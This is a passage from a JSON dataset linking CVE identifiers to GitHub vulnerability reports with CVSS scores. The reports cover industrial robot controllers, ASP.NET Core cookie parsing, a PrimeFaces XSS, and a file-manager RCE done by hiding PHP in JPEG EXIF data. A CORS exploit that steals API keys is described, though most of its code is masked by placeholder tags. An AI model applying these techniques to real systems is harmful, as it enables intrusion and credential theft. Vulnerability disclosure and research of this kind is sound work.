        "description": "Hardcoded default credentials on IRC NUMBERTAG OPC Server. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10288",
        "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/3327",
        "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/3327",
        "Repo_new": "aliasrobotics/rvd",
        "Issue_Created_At": "2020-07-15T22:03:16Z",
        "description": "No authentication required for accesing ABB IRC5 FTP server. yaml id NUMBERTAG title: No authentication required for accesing ABB IRC5 FTP server type: vulnerability description: IRC5 exposes an ftp server (port NUMBERTAG Upon attempting to gain access you are challenged with a request of username and password, however you can input whatever you like. As long as the field isn't empty it will be accepted. cwe: CVETAG cve: CVETAG keywords: IRC5, FTP, Autentication system: IRB NUMBERTAG IRC5, Robotware NUMBERTAG APITAG vendor: ABB severity: rvss score NUMBERTAG rvss vector: PATHTAG severity description: Critical cvss score NUMBERTAG cvss vector: PATHTAG links: CVETAG flaw: phase: testing specificity: general issue architectural location: Plataform code application: FTP server subsystem: APITAG package: N/A languages: None date detected NUMBERTAG detected by: Alfonso Glera, Victor Mayoral Vilches APITAG Robotics) detected by method: testing dynamic, Nmap. date reported NUMBERTAG reported by: Victor Mayoral Vilches reported by relationship: security researcher issue: null reproducibility: Always trace: Not disclosed reproduction: Not disclosed reproduction image: Not disclosed exploitation: description: Not disclosed exploitation image: Not disclosed exploitation vector: Not disclosed exploitation recipe: '' mitigation: description: Not disclosed pull request: Not disclosed date mitigation: null",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10290",
        "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/1495",
        "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/1495",
        "Repo_new": "aliasrobotics/rvd",
        "Issue_Created_At": "2020-04-03T15:49:12Z",
        "description": "Universal Robots APITAG execute with unbounded privileges. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.8,
        "impactScore": 5.9,
        "exploitabilityScore": 0.9
    },
    {
        "CVE_ID": "CVE-2020-10291",
        "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/3336",
        "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/3336",
        "Repo_new": "aliasrobotics/rvd",
        "Issue_Created_At": "2020-11-06T09:25:26Z",
        "description": "System information disclosure without authentication on KUKA simulators. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-1045",
        "Issue_Url_old": "https://github.com/dotnet/announcements/issues/165",
        "Issue_Url_new": "https://github.com/dotnet/announcements/issues/165",
        "Repo_new": "dotnet/announcements",
        "Issue_Created_At": "2020-09-08T17:44:01Z",
        "description": "Microsoft Security Advisory CVETAG | Microsoft ASP.NET Core Security Feature Bypass Vulnerability. Microsoft Security Advisory CVETAG | Microsoft ASP.NET Core Security Feature Bypass Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A security feature bypass vulnerability exists in the way Microsoft ASP.NET Core parses encoded cookie names. The ASP.NET Core cookie parser decodes entire cookie strings which could allow a malicious attacker to set a second cookie with the name being percent encoded. The security update addresses the vulnerability by fixing the way the ASP.NET Core cookie parser handles encoded names. Discussion Discussion for this issue can be found at URLTAG APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Please note that .NET Core NUMBERTAG is now out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software you are exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG You should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-1045",
        "Issue_Url_old": "https://github.com/dotnet/aspnetcore/issues/25701",
        "Issue_Url_new": "https://github.com/dotnet/aspnetcore/issues/25701",
        "Repo_new": "dotnet/aspnetcore",
        "Issue_Created_At": "2020-09-08T18:12:34Z",
        "description": "Microsoft Security Advisory CVETAG | Microsoft ASP.NET Core Security Feature Bypass Vulnerability. Microsoft Security Advisory CVETAG | Microsoft ASP.NET Core Security Feature Bypass Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A security feature bypass vulnerability exists in the way Microsoft ASP.NET Core parses encoded cookie names. The ASP.NET Core cookie parser decodes entire cookie strings which could allow a malicious attacker to set a second cookie with the name being percent encoded. The security update addresses the vulnerability by fixing the way the ASP.NET Core cookie parser handles encoded names. Announcement Announcement for this issue can be found at URLTAG APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Please note that .NET Core NUMBERTAG is now out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software you are exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG You should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-1045",
        "Issue_Url_old": "https://github.com/github/advisory-database/issues/302",
        "Issue_Url_new": "https://github.com/github/advisory-database/issues/302",
        "Repo_new": "github/advisory-database",
        "Issue_Created_At": "2022-05-19T19:16:56Z",
        "description": ".NET / ASP .NET CVEs package vulnerabilities backfill. Hi team! We would like to backfill to the DB APITAG package vulnerabilities for NUMBERTAG The list of vulnerabilities below are for .NET and ASP.NET Microsoft packages. Those already have CVEs and the impacted packages were specified in announcements published with each CVE in the .NET / ASP.NET Announcement repositories ( URLTAG , URLTAG Please let me know if additional details are needed. //cc MENTIONTAG , MENTIONTAG MENTIONTAG CVE | Title | Announcement date | CVE URL | Announcement URL | Impacted software | Vulnerable package id | Vulnerable version range | Fixed in version | | | | | | | | CVETAG | Open Redirect can cause Elevation Of Privilege | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG APITAG NUMBERTAG CVETAG | Open Redirect can cause Elevation Of Privilege | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG APITAG NUMBERTAG CVETAG | Denial Of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Denial Of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Denial Of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Denial Of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Denial Of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | CORS bypass can enable Information Disclosure | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | CORS bypass can enable Information Disclosure | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | CORS bypass can enable Information Disclosure | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | CORS bypass can enable Information Disclosure | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Denial of Service Vulnerability in Odata | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | Denial of Service Vulnerability in Odata | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | Denial of Service Vulnerability in Odata | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | Denial of Service Vulnerability in Odata | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Tampering Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core NUMBERTAG APITAG NUMBERTAG CVETAG | .NET Core Information Disclosure Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | .NET Core Information Disclosure Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | .NET Core Information Disclosure Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core NUMBERTAG and NUMBERTAG APITAG | ? | ? CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | .NET Core Domain Spoofing Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | .NET Core Domain Spoofing Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | .NET Core Domain Spoofing Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | .NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core and ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | .NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core and ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Spoofing Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Spoofing Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Spoofing Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Spoofing Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Spoofing Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Spoofing Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Spoofing Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Elevation Of Privilege Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Elevation Of Privilege Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Remote Code Execution Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Remote Code Execution Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Remote Code Execution Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Remote Code Execution Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Remote Code Execution Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | .NET Core Remote Code Execution Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | Microsoft ASP.NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | Microsoft ASP.NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | Microsoft ASP.NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10544",
        "Issue_Url_old": "https://github.com/primefaces/primefaces/issues/5642",
        "Issue_Url_new": "https://github.com/primefaces/primefaces/issues/5642",
        "Repo_new": "primefaces/primefaces",
        "Issue_Created_At": "2020-03-04T12:09:20Z",
        "description": "tooltip: XSS in target title NUMBERTAG Environment APITAG version NUMBERTAG Does it work on the newest released APITAG version? No Does it work on the newest sources in APITAG No Affected browsers: all NUMBERTAG Expected behavior Proper escaping of title referenced by p:tooltip for NUMBERTAG Actual behavior Target title not escaped in FILETAG if APITAG is set in FILETAG NUMBERTAG Steps to reproduce NUMBERTAG Sample XHTML APITAG APITAG NUMBERTAG Sample bean NUMBERTAG Solution This error was fixed for the APITAG function in FILETAG with NUMBERTAG Same solution should be applied to Function APITAG The line APITAG = APITAG === undefined) ? true : APITAG must be added at top of APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-10567",
        "Issue_Url_old": "https://github.com/trippo/ResponsiveFilemanager/issues/600",
        "Issue_Url_new": "https://github.com/trippo/responsivefilemanager/issues/600",
        "Repo_new": "trippo/responsivefilemanager",
        "Issue_Created_At": "2020-03-13T20:06:55Z",
        "description": "remote code execution vulnerability FILETAG in save_img action because of no validation on extension name.. after taking another look at your application i noticed in the FILETAG file in the \"save_img\" action that the \"name\" parameter doesn't validate the extension of the file. this makes it possible to upload php files to the server even when this normaly should not be allowed. there was a miner validation to check if the data from the \"url\" parameter started with \"data:image/jpeg;base NUMBERTAG and that the base NUMBERTAG encoded image is a valid image. a simple work arround to bypass this check is to upload a valid jpeg image, but that inside of exif data a php tag is send. this makes it possible to send php code and that the extension becomes php what let to remote code execution. As poc i will send a normal image where the base NUMBERTAG encoded image contains APITAG as php code. here is a simple javascript POC that will send a POST request to the page \" URLTAG \" where the \"path\" parameters is empty, the url contains my image with phpinfo in the exif data and the name is set to FILETAG . you will need to change the ip and port to your webserver and this code has to be runned on the filemanagers FILETAG page, because the session is validated and by running the code from the dialog page than the session is set and you won't get error's. if you run this command from the browsers console in the dialog page than a new file would be created in the /source/ folder called FILETAG . ( UPLOAD_DIR ) than just go to \" FILETAG \" and you will see the APITAG code executed. ERRORTAG here a copy of the burp request: CODETAG and here a copy of the image urldecoded: ERRORTAG A CVE has been requested and a potential fast patch is to dissable save_img in the config file.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10591",
        "Issue_Url_old": "https://github.com/walmartlabs/concord/issues/22",
        "Issue_Url_new": "https://github.com/walmartlabs/concord/issues/22",
        "Repo_new": "walmartlabs/concord",
        "Issue_Created_At": "2020-03-11T16:35:13Z",
        "description": "Misconfigured CORS allows a malicious user to fetch api keys. Just a security issue I noticed where the accepted origins on CORS appear to be vulnerable. If an authenticated user visits a page such as the following, the VICTIMSKEY is alerted. This could also be sent to an attacker. ` APITAG APITAG APITAG APITAG function APITAG { var xhttp = new APITAG APITAG = APITAG { if APITAG NUMBERTAG APITAG NUMBERTAG APITAG = APITAG } }; APITAG \" URLTAG \", true); APITAG = true; APITAG } APITAG APITAG APITAG APITAG APITAG CORS APITAG Exploit APITAG APITAG full content of page APITAG APITAG APITAG Exploit APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10594",
